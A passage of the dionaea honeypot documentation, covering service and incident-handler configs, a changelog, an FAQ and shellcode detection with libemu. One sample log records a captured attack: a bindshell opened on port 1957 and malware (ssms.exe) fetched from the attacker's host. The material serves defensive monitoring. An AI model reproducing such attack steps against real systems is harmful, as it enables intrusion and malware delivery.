1150 # 4:"Windows 7 Service Pack 1",
1151 # 5:"Linux Samba 4.3.11"
1152 # os_type: 2
1153
1154 # Additional config
1155 # primary_domain: Test
1156 # oem_domain_name: Test
1157 # server_name: TEST-SERVER
1158
1159 ## Windows 7 ##
1160 # native_os: Windows 7 Professional 7600
1161 # native_lan_manager: Windows 7 Professional 6.1
1162 # shares:
1163 # ADMIN$:
1164 # comment: Remote Admin
1165 # path: C:\\Windows
1166 # type: disktree
1167 # C$:
1168 # coment: Default Share
1169 # path: C:\\
1170 # type:
1171 # - disktree
1172 # - special
1173 # IPC$:
1174 # comment: Remote IPC
1175 # type: ipc
1176 # Printer:
1177 # comment: Microsoft XPS Document Writer
1178 # type: printq
1179
1180 ## Samba ##
1181 # native_os: Windows 6.1
1182 # native_lan_manager: Samba 4.3.11
1183 # shares:
1184 # admin:
1185 # comment: Remote Admin
1186 # path: \\home\\admin
1187 # type: disktree
1188 # share:
1189 # coment: Default Share
1190 # path: \\share
1191 # type: disktree
1192 # IPC$:
1193 # comment: Remote IPC
1194 # path: IPC Service
1195 # type: ipc
1196 # Printer:
1197 # comment: Printer Drivers
1198 # type: printq
1199
1200
1201 TFTP
1202 Written to test the udp connection code, dionaea provides a tftp server
1203 on port 69, which can serve files. Even though there were vulnerabili‐
1204 ties in tftp services, I’m yet to see an automated attack on tftp ser‐
1205 vices.
1206
1207 Example config
1208 services/tftp.yaml.INDENT 0.0
1209
1210 - name: tftp
1211 config:
1212 root: /var/lib/dionaea/roots/tftp
1213
1214
1215 UPnP
1216 Example config
1217 services/upnp.yaml.INDENT 0.0
1218
1219 - name: upnp
1220 config:
1221 root: /var/lib/dionaea/roots/upnp
1222 # maximum size in kbytes of the request (32MB)
1223 max_request_size: 32768
1224 personality:
1225 # default
1226 cache: "CACHE-CONTROL: max-age=120\r\n"
1227 st: "ST: upnp:rootdevice\r\n"
1228 usn: "USN: uuid:Upnp-IPMI-1_0-1234567890001::upnp:rootdevice\r\n"
1229 server: "SERVER: Linux/2.6.17.WB_WPCM450.1.3 UPnP/1.0, Intel SDK for UPnP devices/1.3.1\r\n"
1230 location: "LOCATION: http://192.168.0.1:49152/IPMIdevicedesc.xml\r\n"
1231 opt: "OPT: http://schemas.upnp.org/upnp/1/0/\r\n"
1232 # # Samsung TV
1233 # cache: "CACHE-CONTROL: max-age=900\r\n"
1234 # st: "ST: uuid:c1fd12b2-d954-4dba-9e92-a697e1558fb4\r\n"
1235 # usn: "USN: uuid:c1fd12b2-d954-4dba-9e92-a697e1558fb4\r\n"
1236 # server: "SERVER: SHP, UPnP/1.0, Samsung UPnP SDK/1.0\r\n"
1237 # location: "LOCATION: http://192.168.0.10:7677/MainTVServer2\r\n"
1238 # opt: "OPT: http://schemas.upnp.org/upnp/1/0/\r\n"
1239 #
1240 # # XBOX 360
1241 # cache: "CACHE-CONTROL: max-age=1800\r\n"
1242 # st: "ST: urn:microsoft.com:service:X_MS_MediaReceiverRegistrar:1\r\n"
1243 # usn: "USN: uuid:531c567a-8c46-4201-bcd4-09afa554d859::urn:microsoft.com:service:X_MS_MediaReceiverRegistrar:1\r\n"
1244 # server: "SERVER: Microsoft-Windows/6.3 UPnP/1.0 UPnP-Device-Host/1.0\r\n"
1245 # location: "LOCATION: http://192.168.0.10:1055/upnphost/udhisapi.dll?content=uuid:531c567a-8c46-4201-bcd4-09afa554d859\r\n"
1246 # opt: "OPT: http://schemas.upnp.org/upnp/1/0/\r\n"
1247
1248
1250 Getting a copy of the malware is cool, getting an overview of the
1251 attacks run on your sensor is priceless.
1252
1253 dionaea can write information to a text file, but be aware, dionaeas
1254 logging to text files is rather chatty, really chatty, and you do not
1255 want to look at the information, if you are not debugging the software
1256 or writing some new feature for it.
1257
1258 Of course, you can appy filters to the logging, to limit it to differ‐
1259 ent facilities or levels, but in general you do not want to work with
1260 text files.
1261
1262 dionaea uses some internal communication system which is called inci‐
1263 dents. An incident has an origin, which is a string, a path, and prop‐
1264 erties, which can be integers, strings, or a pointer to a connection.
1265 Incidents limit to the max, they pass the information required to inci‐
1266 dent handlers (ihandler). An ihandler can register a path for inci‐
1267 dents he wants to get informed about, the pathes are matched in a glob
1268 like fashion. Therefore logging information using an ihandler is supe‐
1269 rior to text logging, you get the information you are looking for, and
1270 can write it to a format you choose yourself.
1271
1272 List of available ihandlers
1273
1274 emuprofile
1275 Example config
1276 ihandlers/emuprofile.yaml.INDENT 0.0
1277
1278 - name: emuprofile
1279
1280
1281 fail2ban
1282 Example config
1283 ihandlers/fail2ban.yaml.INDENT 0.0
1284
1285 - name: fail2ban
1286 config:
1287 downloads: "/var/lib/dionaea/downloads.f2b"
1288 offers: "/var/lib/dionaea/offers.f2b"
1289
1290
1291 ftp
1292 Example config
1293 ihandlers/ftp.yaml.INDENT 0.0
1294
1295 # ftp client section
1296 - name: ftp
1297 config:
1298 # host for active ftp via NAT
1299 # * 0.0.0.0 - the initiating connection ip is used for active ftp
1300 # * not 0.0.0.0 - gets resolved as hostname and used
1301 active_host: "0.0.0.0"
1302
1303 # ports for active ftp; string indicating a range
1304 active_ports: 63001-64000
1305
1306
1307 hpfeeds
1308 Example config
1309 ihandlers/hpfeeds.yaml.INDENT 0.0
1310
1311 - name: hpfeeds
1312 config:
1313 server: "hpfriends.honeycloud.net"
1314 port: 10000
1315 ident: ""
1316 secret: ""
1317 # dynip_resolve: enable to lookup the sensor ip through a webservice
1318 dynip_resolve: "http://hpfriends.honeycloud.net/ip"
1319
1320
1321 log_db_sql
1322 WARNING:
1323 This ihanlder is experimental.
1324
1325 This incident handler can write interesting information about attacks
1326 and connections into an SQL database. It uses SQLAlchemy to support
1327 different databases.
1328
1329 Example config
1330 ihandlers/log_db_sql.yaml.INDENT 0.0
1331
1332 - name: log_db_sql
1333 config:
1334 url: sqlite:////var/lib/dionaea/dionaea.db
1335
1336
1337 log_incident
1338 This ihandler can be used to export incidents in realtime to be pro‐
1339 cessed by external programs.
1340
1341 WARNING:
1342 This ihandler is in pre alpha state and it might be changed or
1343 removed in the future.
1344
1345 Configure
1346 handlers
1347 List of URLs to submit the information to. At the moment only file,
1348 http and https are supported.
1349
1350 Format
1351 {
1352 "name": "<sensor-name>",
1353 "origin": "<name of the incident>",
1354 "timestamp": "<date in ISO 8601>",
1355 "data": {
1356 "connection": {
1357 "id": <internal ID>,
1358 "local_ip": "<local IP>",
1359 "local_port": <local port>,
1360 "remote_ip": "<remote IP>",
1361 "remote_hostname": "<remote hostname if resolvable>",
1362 "remote_port": <remote port>,
1363 "protocol": "<protocol>",
1364 "transport": "<transport tcp|udp>"
1365 }
1366 }
1367 }
1368
1369 Example config
1370 ihandlers/log_incident.yaml.INDENT 0.0
1371
1372 - name: log_incident
1373 config:
1374 handlers:
1375 #- http://127.0.0.1:8080/
1376 - file:///var/lib/dionaea/dionaea_incident.json
1377
1378
1379 log_json
1380 This ihandler can submit information about attacks/connections encoded
1381 as json.
1382
1383 WARNING:
1384 This ihandler is in pre alpha state and it might be changed or
1385 removed in the near future.
1386
1387 Configure
1388 flat_data
1389 Set to true to flatten object lists.
1390
1391 handlers
1392 List of URLs to submit the information to. At the moment only file,
1393 http and https are supported.
1394
1395 Format
1396 Format of the connection information:
1397
1398 {
1399 "connection": {
1400 "local": {
1401 "address": "<string:local ip address>",
1402 "port": <integer:local port>,
1403 },
1404 "protocol": "<string:service name e.g. httpd>",
1405 "remote": {
1406 "address": "<string:remote ip address>",
1407 "port": <integer:remote port>,
1408 "hostname": "<string:hostname of the remote host>"
1409 },
1410 "transport": "<string:transport protocol e.g. tcp or udp>",
1411 "type": "<string:connection type e.g. accepted, listen, ...>"
1412 }
1413 }
1414
1415 Example config
1416 ihandlers/log_json.yaml.INDENT 0.0
1417
1418 - name: log_json
1419 config:
1420 # Uncomment next line to flatten object lists to work with ELK
1421 # flat_data: true
1422 handlers:
1423 #- http://127.0.0.1:8080/
1424 - file:///var/lib/dionaea/dionaea.json
1425
1426
1427 log_sqlite
1428 WARNING:
1429 This ihandler was renamed in dionaea 0.4.0 from logsql to
1430 log_sqlite.
1431
1432 This is what the logsql python script does, it is an ihandler, and
1433 writes interesting incidents to a sqlite database, one of the benefits
1434 of this logging is the ability to cluster incidents based on the ini‐
1435 tial attack when retrieving the data from the database:
1436
1437 connection 610 smbd tcp accept 10.69.53.52:445 <- 10.65.34.231:2010
1438 dcerpc request: uuid '3919286a-b10c-11d0-9ba8-00c04fd92ef5' opnum 9
1439 p0f: genre:'Windows' detail:'XP SP1+, 2000 SP3' uptime:'-1' tos:'' dist:'11' nat:'0' fw:'0'
1440 profile: [{'return': '0x7c802367', 'args': ['', 'CreateProcessA'], 'call': 'GetProcAddress'},
1441 ...., {'return': '0', 'args': ['0'], 'call': 'ExitThread'}]
1442 service: bindshell://1957
1443 connection 611 remoteshell tcp listen 10.69.53.52:1957
1444 connection 612 remoteshell tcp accept 10.69.53.52:1957 <- 10.65.34.231:2135
1445 p0f: genre:'Windows' detail:'XP SP1+, 2000 SP3' uptime:'-1' tos:'' dist:'11' nat:'0' fw:'0'
1446 offer: fxp://1:1@10.65.34.231:8218/ssms.exe
1447 download: 1d419d615dbe5a238bbaa569b3829a23 fxp://1:1@10.65.34.231:8218/ssms.exe
1448 connection 613 ftpctrl tcp connect 10.69.53.52:37065 -> 10.65.34.231/None:8218
1449 connection 614 ftpdata tcp listen 10.69.53.52:62087
1450 connection 615 ftpdata tcp accept 10.69.53.52:62087 <- 10.65.34.231:2308
1451 p0f: genre:'Windows' detail:'XP SP1+, 2000 SP3' uptime:'-1' tos:'' dist:'11' nat:'0' fw:'0'
1452
1453 Additionally, you can query the database for many different things,
1454 refer to:
1455
1456 · dionaea sql logging 2009/11/06
1457
1458 · post it yourself 2009/12/08
1459
1460 · sqlite performance 2009/12/12
1461
1462 · virustotal fun 2009/12/14
1463
1464 · Andrew Waite’s Blog for mimic-nepstats.py
1465
1466 for more examples how to make use of the database.
1467
1468 Example config
1469 ihandlers/log_sqlite.yaml.INDENT 0.0
1470
1471 - name: log_sqlite
1472 config:
1473 file: /var/lib/dionaea/dionaea.sqlite
1474
1475
1476
1477 nfq
1478 Example config
1479 ihandlers/nfq.yaml.INDENT 0.0
1480
1481 - name: nfq
1482 # nfq can intercept incoming tcp connections during the tcp handshake
1483 # giving your honeypot the possibility to provide service on
1484 # ports which are not served by default.
1485 # refer to the documentation BEFORE using this
1486 config:
1487 # 0 = DROP
1488 nfaction: 0
1489 throttle:
1490 window : 30
1491 limits:
1492 total: 30
1493 slot: 30
1494 timeouts:
1495 server:
1496 listen: 5
1497 client:
1498 idle: 10
1499 sustain: 240
1500
1501
1502 p0f
1503 Example config
1504 ihandlers/p0f.yaml.INDENT 0.0
1505
1506 - name: p0f
1507 config:
1508 # start p0f with
1509 # sudo p0f -i any -u root -Q /tmp/p0f.sock -q -l
1510 path: "un:///tmp/p0f.sock"
1511
1512
1513 store
1514 Example config
1515 ihandlers/store.yaml.INDENT 0.0
1516
1517 - name: store
1518
1519
1520 submit_http
1521 Example config
1522 ihandlers/submit_http.yaml.INDENT 0.0
1523
1524 - name: submit_http
1525 config:
1526 # the url to send the submission requests to
1527 url: "http://example.org/"
1528 # E-Mail (optional)
1529 # email: ""
1530 # username (optional)
1531 # user:
1532 # password (optional)
1533 # pass:
1534
1535
1536 submit_http_post
1537 Example config
1538 ihandlers/submit_http_post.yaml.INDENT 0.0
1539
1540 - name: submit_http_post
1541 config:
1542 submit:
1543 file_upload:
1544 urls:
1545 - http://example.org/upload
1546 - http://example.com/file.php
1547 field_values:
1548 submit: "Upload file"
1549 file_fieldname: upload_file
1550
1551
1552 tftp_download
1553 Example config
1554 ihandlers/tftp_download.yaml.INDENT 0.0
1555
1556 - name: tftp_download
1557
1558
1559 VirusTotal
1560 This ihandler submits the captured malware samples to the VirusTotal
1561 service for further analysis.
1562
1563 Configuration
1564 apikey
1565 The VirusTotal API-Key.
1566
1567 file
1568 SQLite database file used to cache the results.
1569
1570 Example config
1571 ihandlers/virustotal.yaml.INDENT 0.0
1572
1573 - name: virustotal
1574 config:
1575 # grab it from your virustotal account at My account -> Inbox -> Public API
1576 apikey: "........."
1577 file: "/var/lib/dionaea/vtcache.sqlite"
1578
1579
1581 Processors control the actions done on the bi-directional streams we
1582 gain when getting attacked, the default is running the emu processor on
1583 them to detect shellcode.
1584
1585 Emu
1586 Use libemu to find and emulate shellcodes.
1587
1588 Configuration
1589 Filter
1590 Only continue with the processing pipeline if all conditions match.
1591
1592 Configuration
1593 protocols
1594 Comma separated list of connection types.
1595
1596 types
1597 Comma separated list of connection types.
1598
1599 · accept - dionaea accepts a new connection from a remote host
1600
1601 · connect - dionaea makes a connection to a remote host
1602
1603 Streamdumper
1604 This processor can dump a connection as bi-directional stream. The
1605 dump can be used to replay an attack on ip-level without messing with
1606 pcap and tcpreplay.
1607
1608 Configuration
1609 path
1610 Dumps will be created in this directory.
1611
1613 First of all, thank you for your interest in contributing to dionaea!
1614
1615 Filing bug reports
1616 Bug reports are very welcome. Please file them on the GitHub issue
1617 tracker. Good bug reports come with extensive descriptions of the
1618 error and how to reproduce it.
1619
1620 Patches
1621 All patches to dionaea should be submitted in the form of pull requests
1622 to the main dionaea repository, DinoTools/dionaea. These pull requests
1623 should satisfy the following properties:
1624
1625 Code
1626 · The pull request should focus on one particular improvement to dion‐
1627 aea.
1628
1629 · Create different pull requests for unrelated features or bugfixes.
1630
1631 · Python code should follow PEP 8, especially in the “do what code
1632 around you does” sense.
1633
1634 Documentation
1635 When introducing new functionality, please remember to write documenta‐
1636 tion.
1637
1638 Review
1639 Finally, pull requests must be reviewed before merging. Everyone can
1640 perform reviews; this is a very valuable way to contribute, and is
1641 highly encouraged.
1642
1644 dionaea initial development was funded by the Honeynet Project as part
1645 of the Honeynets Summer of Code during 2009. The development process
1646 is as open as possible. You can browse the source online and report
1647 bugs on GitHub
1648
1649 Development
1650 Vagrant
1651 Vagrant can be used to setup a development environment for dionaea
1652 within minutes.
1653
1654 Install
1655 First install Vagrant and VirtualBox.
1656
1657 If everything has been setup correctly clone the git repository and use
1658 vagrant to bootstrap and start the environment.
1659
1660 $ git clone https://github.com/DinoTools/dionaea.git
1661 $ cd dionaea/vagrant
1662 $ vagrant up
1663
1664 All files will be installed in the /opt/dionaea directory.
1665
1666 Run
1667 Access the development environment, edit the config files and start
1668 dionaea with the following command.
1669
1670 $ sudo /opt/dionaea/bin/dionaea -c /opt/dionaea/etc/dionaea/dionaea.cfg -l all,-debug -L '*'
1671
1672 Rebuild and test
1673 To rebuild and install dionaea run the flowing commands.
1674
1675 $ cd /vagrant
1676 $ make
1677 $ sudo make install
1678
1679 See Run for more information on how to start dionaea.
1680
1681 Ubuntu 14.04
1682 Instead of using Vagrant you can use a Ubuntu 14.04 system to setup
1683 your development environment. In this section we will use the scripts
1684 used to setup the Vagrant environment to bootstrap a fresh Ubuntu sys‐
1685 tem. If you like you can follow the ../installation ‘From Source’
1686 guide to setup everything by hand.
1687
1688 Install
1689 First install Ubuntu.
1690
1691 If everything has been setup correctly clone the git repository and run
1692 the bootstrap script.
1693
1694 $ git clone https://github.com/DinoTools/dionaea.git
1695 $ vagrant
1696 $ ./bootstrap.sh
1697
1698 All files will be installed in the /opt/dionaea directory.
1699
1700 Rebuild and test
1701 Rebuild, install and start dionaea from the root of the git repository.
1702
1703 $ make
1704 $ sudo make install
1705 $ sudo /opt/dionaea/bin/dionaea -c /opt/dionaea/etc/dionaea/dionaea.cfg -l all,-debug -L '*'
1706
1707 This can also be done in one line.
1708
1709 $ make && sudo make install && sudo dionaea -c /opt/dionaea/etc/dionaea/dionaea.cfg -l all,-debug -L '*'
1710
1711 Find memory leaks
1712 To enable AddressSanitizer you have to add the following parameters to
1713 the configure script and rebuild dionaea.
1714
1715 --disable-shared CFLAGS="-fsanitize=address -ggdb" CXXFLAGS="-fsanitize=address -ggdb"
1716
1717 When running dionaea it will print information about overfow errors.
1718 If you would like to stop execution you have to export an additional
1719 environment variable.
1720
1721 export ASAN_OPTIONS='abort_on_error=1'
1722
1723 To get a stacktrace you can use gdb and add an additional breakpoint
1724 break __asan_report_error.
1725
1726 It is also possible to use asan_symbolize.py python2 script to extract
1727 additional information.
1728
1729 /opt/dionaea/bin/dionaea -c /opt/dionaea/etc/dionaea/dionaea.cfg 2>&1 | python asan_symbolize.py
1730
1731 Logging
1732 Logging should be used to report errors and for debugging purposes. It
1733 must not be used to report attacks. Incidents should be used for this
1734 purpose. For more information have a look at the ihandler section.
1735
1736 Comparison glib2 and Python
1737
1738 ┌─────────┬──────────┐
1739 │glib2 │ Python │
1740 ├─────────┼──────────┤
1741 │debug │ debug │
1742 ├─────────┼──────────┤
1743 │info │ info │
1744 ├─────────┼──────────┤
1745 │warning │ warning │
1746 ├─────────┼──────────┤
1747 │critical │ error │
1748 ├─────────┼──────────┤
1749 │error │ critical │
1750 └─────────┴──────────┘
1751
1752 WARNING:
1753 In glib2 a critical message means critical warning. But in Python a
1754 critical message is handled as critical error.
1755
1756 WARNING:
1757 An error message in glib2 or a critical message in a Python module
1758 will terminate the program immediately.
1759
1760 Incident
1761 Some of the incidents reported by the dionaea core are listed below.
1762
1763 dionaea.connection.tcp.accept:
1764 A new TCP connection has been accepted by dionaea.
1765
1766 dionaea.connection.tls.accept:
1767 A new SSL/TLS connection has been accepted by dionaea.
1768
1769 dionaea.connection.tcp.connect:
1770 Reporte after dionaea has connection to an external service via TCP.
1771
1772 dionaea.connection.tls.connect:
1773 Reporte after dionaea has connection to an external service via
1774 SSL/TLS.
1775
1776 dionaea.connection.udp.connect:
1777 Reporte after dionaea has connection to an external service via UDP.
1778
1779 dionaea.connection.free:
1780 A connection has been closed and freed.
1781
1782 dionaea.connection.tcp.listen:
1783 Fired after a TCP service has been bound and is listening for incom‐
1784 ming connections.
1785
1786 dionaea.connection.tls.listen:
1787 Fired after a SSL/TLS service has been bound and is listening for
1788 incomming connections.
1789
1790 dionaea.connection.tcp.pending:
1791
1792 dionaea.connection.tcp.reject:
1793 A incoming connection has been rejected by the server.
1794
1795 dionaea.connection.link.early:
1796
1797 dionaea.connection.link:
1798 Reported to give the log management the chance to link two connec‐
1799 tions.
1800
1802 0.8.0 - (master)
1803 0.7.0 - (2018-05-01)
1804 build
1805
1806 · Add initial cmake support
1807
1808 ci
1809
1810 · Add Debian 9
1811
1812 dionaea
1813
1814 · Fix build error with OpenSSL 1.1.0
1815
1816 · Improve OpenSSL 1.1.0 support
1817
1818 · Cleanup connection code
1819
1820 · Enable bistream for SSL/TLS connections (Thanks Aws0mus)
1821
1822 · Fixing chroot bugs (Thanks Michal Ambroz)
1823
1824 doc
1825
1826 · Add additional information
1827
1828 · Doxygen config file for dionaea c core
1829
1830 · Ubuntu 16.04 install instructions
1831
1832 package
1833
1834 · Remove old and deprecated debian package config
1835
1836 python
1837
1838 · Fix typo in config key
1839
1840 · Fix hardcoded python path
1841
1842 · Fix compilation on CentOS7 (Thanks Michal Ambroz)
1843
1844 python/http
1845
1846 · Initial support to handle SOAP requests
1847
1848 python/log_incident
1849
1850 · Improve hash generator
1851
1852 · Fix bug if parent is unknown
1853
1854 · Remove IDs from list if processed
1855
1856 python/mongo
1857
1858 · Initial support to simulate a MongoDB server
1859
1860 python/pyev
1861
1862 · Update from 0.8 to 0.9 to support Python >= 3.6
1863
1864 python/smb
1865
1866 · Add support for WannaCry and SambaCry (Big thanks to gento)
1867
1868 · Add additional config options to change identity
1869
1870 python/util
1871
1872 · Find Download commands for Linux shell
1873
1874 0.6.0 - (2016-11-14)
1875 dionaea
1876
1877 · Fix build for musl lib
1878
1879 doc
1880
1881 · Fix install instructions
1882
1883 · Extend README.md
1884
1885 python/blackhole
1886
1887 · New service/Initial version
1888
1889 python/emu_scripts
1890
1891 · New handler to analyse downloaded scripts
1892
1893 · Detect VBScript and PowerShell
1894
1895 · Limit number of subdownloads
1896
1897 python/http
1898
1899 · Clean up
1900
1901 · Use state vars instead of strings
1902
1903 · Add template support * Jinja 2 template engine * nginx template
1904
1905 python/mysql
1906
1907 · Dump files from SELECT queries
1908
1909 · Extract URLs from functions
1910
1911 · Variable handler
1912
1913 · Support for selecting variables
1914
1915 python/p0f
1916
1917 · Fix decode error
1918
1919 python/pptp
1920
1921 · Fix error if config is empty
1922
1923 0.5.1 - 2016-09-05
1924 dionaea
1925
1926 · Don’t report ‘connection.free’ incident to early to prevent segmenta‐
1927 tion faults
1928
1929 0.5.0 - 2016-08-06
1930 dionaea
1931
1932 · Handle byte objects in incidents
1933
1934 · Bump required Python version from 3.2 to 3.4
1935
1936 python/http
1937
1938 · Detect Shellshock attacks
1939
1940 python/log_incident
1941
1942 · Initial support to export raw incident information
1943
1944 python/log_sqlite
1945
1946 · Log credentials from the ftp service
1947
1948 python/memcache
1949
1950 · Initial support for the memcached protocol
1951
1952 python/pptp
1953
1954 · Clean up
1955
1956 · Handle CallClearRequests packets
1957
1958 · Values for hostname, vendor name and firmware revision are now cus‐
1959 tomizable
1960
1961 python/util
1962
1963 · New function to detect shellshock attacks and report detected URLs
1964
1965 0.4.2 - 2016-07-02
1966 doc
1967
1968 · Add information about log levels for developers
1969
1970 python/*
1971
1972 · Replace all critical log messages with error messages
1973
1974 · Catch exceptions in handle_io_in() and handle_io_out() to improve
1975 stability
1976
1977 · Catch exceptions in incident handlers
1978
1979 python/sip
1980
1981 · Fix error while reading config values
1982
1983 python/upnp
1984
1985 · Fix errors in log messages
1986
1987 more
1988
1989 · Add templates to create issues and merge requests on github
1990
1991 0.4.1 - 2016-06-14
1992 core
1993
1994 · Initialize stdout logger earlier
1995
1996 · Log error,critical and warning by default
1997
1998 python/*
1999
2000 · In glib2 critical is a critical warning
2001
2002 · Add support for exceptions
2003
2004 · Check file path and show warnings
2005
2006 python/log_json
2007
2008 · Add support for flat object lists to work with ELK stack
2009
2010 0.4.0 - 2016-05-31
2011 core
2012
2013 · Replace lcfg with Key-value file parser from glib
2014
2015 ci
2016
2017 · Add build tests for Ubuntu 14.04, Ubuntu 16.04 and Debian 8
2018
2019 doc
2020
2021 · Add initial documentation for missing modules
2022
2023 · Update documentation to reflact config changes
2024
2025 · Add processor documentation
2026
2027 python/*
2028
2029 · Replace lcfg with yaml configs
2030
2031 · Remove deprecated incident handlers (logxmpp, mwserv, SurfIDS)
2032
2033 · Rename incident handlers from logsql to log_sqlite
2034
2035 · Rename incident handlers from uniqdownload to submit_http_post
2036
2037 python/mysql
2038
2039 · Enable processor pipeline
2040
2041 0.3.0 - 2016-03-30
2042 core
2043
2044 · Code clean up (Thanks to Katarina)
2045
2046 · Vagrant based dev environment
2047
2048 · Customize ssl/tls parameters for autogenerated certificates
2049
2050 doc
2051
2052 · Initial version of sphinx based documentation
2053
2054 python/ftp
2055
2056 · Support to customize response messages
2057
2058 · Small fixes
2059
2060 python/hpfeeds
2061
2062 · Initial ihandler support (Thanks to rep)
2063
2064 python/http
2065
2066 · Customize HTTP response headers
2067
2068 · Return HTTP/1.1 instead of HTTP/1.0
2069
2070 python/log_json
2071
2072 · Initial ihandler support
2073
2074 python/mqtt
2075
2076 · Initial protocol support (Thanks to gento)
2077
2078 python/pptp
2079
2080 · Initial protocol support (Thanks to gento)
2081
2082 python/upnp
2083
2084 · Initial protocol support (Thanks to gento)
2085
2086 0.2.1 - 2014-07-16
2087 core
2088
2089 · Support for cython and cython3
2090
2091 · Fixes to build with glib 2.40
2092
2093 · Remove build warnings
2094
2095 · Support libnl >= 3.2.21
2096
2097 python/http
2098
2099 · Fix unlink() calls
2100
2101 python/virustotal
2102
2103 · virustotal API v2.0
2104
2105 0.2.0 - 2013-11-02
2106 Last commit by original authors.
2107
2108 0.1.0
2109 · Initial release.
2110
2112 WARNING:
2113 The documentation is work in progress.
2114
2115 Build/Install
2116 I get gcc: command not found?
2117 install gcc..
2118
2119 How to uninstall it?
2120 rm -rf /opt/dionaea
2121
2122 I get binding.pyx:…: undeclared name not builtin: bytes during the
2123 python modules build.
2124 Install a recent cython version
2125
2126 I get Python.h not found during compiling cython
2127 Install appropriate headers for your python interpreter
2128
2129 I do not use ubuntu/debian and the instructions are useless for me
2130 therefore.
2131 I use debian/ubuntu, and therefore I can only provide instructions
2132 for debian/ubuntu, but you are free to send me a diff for your oper‐
2133 ating system
2134
2135 I use Redhat/Centos 5 and the installation is frustrating and a mess as
2136 nothing works.
2137 Thats right, but I did not choose your operating system. Here is a
2138 list of outdated or missing packages for your choosen distribution:
2139 all. Yes, you’ll even have to install glib (you’ll have 2.10 where
2140 2.20 is required) from source. Getting python3 compiled with a
2141 recent sqlite3 version installed to /opt/dionaea requires editing
2142 the setup.py file (patch <http://p.carnivore.it/KDIFWt>). /I expe‐
2143 rienced this wonderful operating system myself … You really have to
2144 love your distro to stick with it, even if it ships software ver‐
2145 sions your grandma saw released in her youth. Centos is the best
2146 distro … to change distros. No matter what you choose, it can’t get
2147 worse./
2148
2149 Unable to build.
2150
2151 ==> default: cp build/*/dionaea/*.so /opt/dionaea/lib/dionaea/python.so
2152 ==> default: cp:
2153 ==> default: target ‘/opt/dionaea/lib/dionaea/python.so’ is not a directory
2154
2155 ==> default: libtool: Version mismatch error. This is libtool 2.4.6 Debian-2.4.6-2, but the
2156 ==> default: libtool: definition of this LT_INIT comes from libtool 2.4.2.
2157 ==> default: libtool: You should recreate aclocal.m4 with macros from libtool 2.4.6 Debian-2.4.6-2
2158 ==> default: libtool: and run autoconf again.
2159
2160 Try to clean your build environment.
2161
2162 WARNING:
2163 This will remove all ignored and untracked files from the direc‐
2164 tory. Use –dry-run
2165
2166 git clean -xdf
2167
2168 Run
2169 I get OperationalError at unable to open database file when using
2170 logsqlite and it does not work at all
2171 Read the logsql instructions <#logsql>
2172
2173 I get a Segmentation Fault
2174 Read the segfault instructions <#segfault>
2175
2176 I logrotate, and after logrotate dionaea does not log anymore.
2177 Read the logrotate instructions <#logging>
2178
2179 p0f does not work.
2180 Make sure your have p0f 2.0.8 and dionaea does not listen on ::, p0f
2181 can’t deal with IPv6.
2182
2183 I’m facing a bug, it fails, and I can’t figure out why.
2184 Explain the problem, if I’m interested in the nature of the problem,
2185 as it does not sound like pebcak, I may ask for a shell/screen and
2186 have a look myself, and if it is worth it, you’ll even get a FAQ
2187 entry for some specialties of your OS.
2188
2189 Unable to bind to port after dropping privileges
2190 Dropping privileges and binding to ports lower than 1024 is only
2191 support on Linux systems. If some of the optional build dependen‐
2192 cies are missing dionaea might not be able to bind to these ports
2193 too. After enabling all log levels it should display some log mes‐
2194 sages like in the example below.
2195
2196 [10052017 15:58:17] connection connection.c:200: bind_local con 0x55f21b1ec720
2197 [10052017 15:58:17] connection connection.c:216: bind_local socket 10 1.2.3.4:21
2198 [10052017 15:58:17] connection connection.c:230: Could not bind 1.2.3.4:21 (Permission denied)
2199
2200 To fix this issue you have to install the kernel headers for your
2201 kernel and rebuild dionaea. If everything works as it should you
2202 might get log messages like in the example below. You might have
2203 noticed that there is now a pchild section. This means dionaea is
2204 using a child process with extended privileges to bind to the port.
2205
2206 [10052017 15:58:17] connection connection.c:200: bind_local con 0x55f21b1ec720
2207 [10052017 15:58:17] connection connection.c:216: bind_local socket 10 1.2.3.4:21
2208 [10052017 15::58:17] pchild pchild.c:199: sending msg to child to bind port ...
2209 [10052017 15::58:17] pchild pchild.c:218: child could bind the socket!
2210 [10052017 15::58:17] connection connection.c:316: ip '1.2.3.4' node '1.2.3.4:21'
2211
2213 WARNING:
2214 The documentation is work in progress.
2215
2216 Rotate bistream files
2217 Dionaea does not have and may never will have a function/option to
2218 rotate the bistream files. But you can do this by using a cron job and
2219 a simple shell script.
2220
2221 Feel free to use and modify the script below.
2222
2223 #!/bin/bash
2224
2225 # Compress bistream files older than 2 days
2226 find /var/lib/dionaea/bistreams/* -type f -mtime +2 -exec gzip {} \;
2227
2228 # Clear bistream logs from dionaea every week
2229 find /var/lib/dionaea/bistreams/* -type f -mtime +7 -exec rm {} \;
2230 find /var/lib/dionaea/bistreams/* -type d -empty -delete
2231
2233 Cui honorem, honorem
2234 Google:
2235 Google has supported 3 students to work on dionaea during GSoc 2009,
2236 GSoc 2010 and GSoc 2011.
2237
2238 SURFnet:
2239 SURFnet has supported the project in the past(2010?-2014?). Working
2240 with SURFnet is a real pleasure.
2241
2242 Support
2243 If you are getting frustrated, because things to not work for you and
2244 you already read the faq, join the ml and share your experience, or the
2245 chat.
2246
2247 GitHub
2248 Use the issue tracker to report any problem.
2249
2250 Website: Issue tracker
2251
2252 IRC
2253 From time to time some of the developers join the #nepenthes channel
2254 on freenode. irc://irc.freenode.org/nepenthes
2255
2256 Mailing List:
2257 Only a few messages every year. Seems to be dead, no message since
2258 2015.
2259
2260 Website: Mailinglist nepenthes-devel
2261
2262 Links
2263 · GSoC 2009 Project #10 http://honeynet.org/gsoc/project10
2264
2265 · The Honeynet Project
2266
2267 Old documentation:
2268
2270 Attackers do not seek your service, attackers want to exploit you,
2271 they’ll chat with the service for some packets, and afterwards sent a
2272 payload. dionaea has to detect and evaluate the payload to be able to
2273 gain a copy of the malware. In order to do so, dionaea uses libemu.
2274
2275 Given certain circumstances, libemu can detect shellcode, measure the
2276 shellcode, and if required even execute the shellcode. Shellcode detec‐
2277 tion is done by making use of GetPC heuristics, others wrote papers
2278 about it, we decided to write libemu to do so. This detection is rather
2279 time consuming, and therefore done using threads.
2280
2281 The part of dionaea which takes care of the network io can create a
2282 copy of all in/output run for a connection, this copy is passed to the
2283 detection facility, which is a tree of detection facilities, at this
2284 moment there is only a single leaf, the emu plugin. The emu plugin uses
2285 threads and libemu to detect and profile/measure shellcode.
2286
2287 Shellcode measurement/profiling is done by running the shellcode in the
2288 libemu vm and recording API calls and arguments. For most shellcode
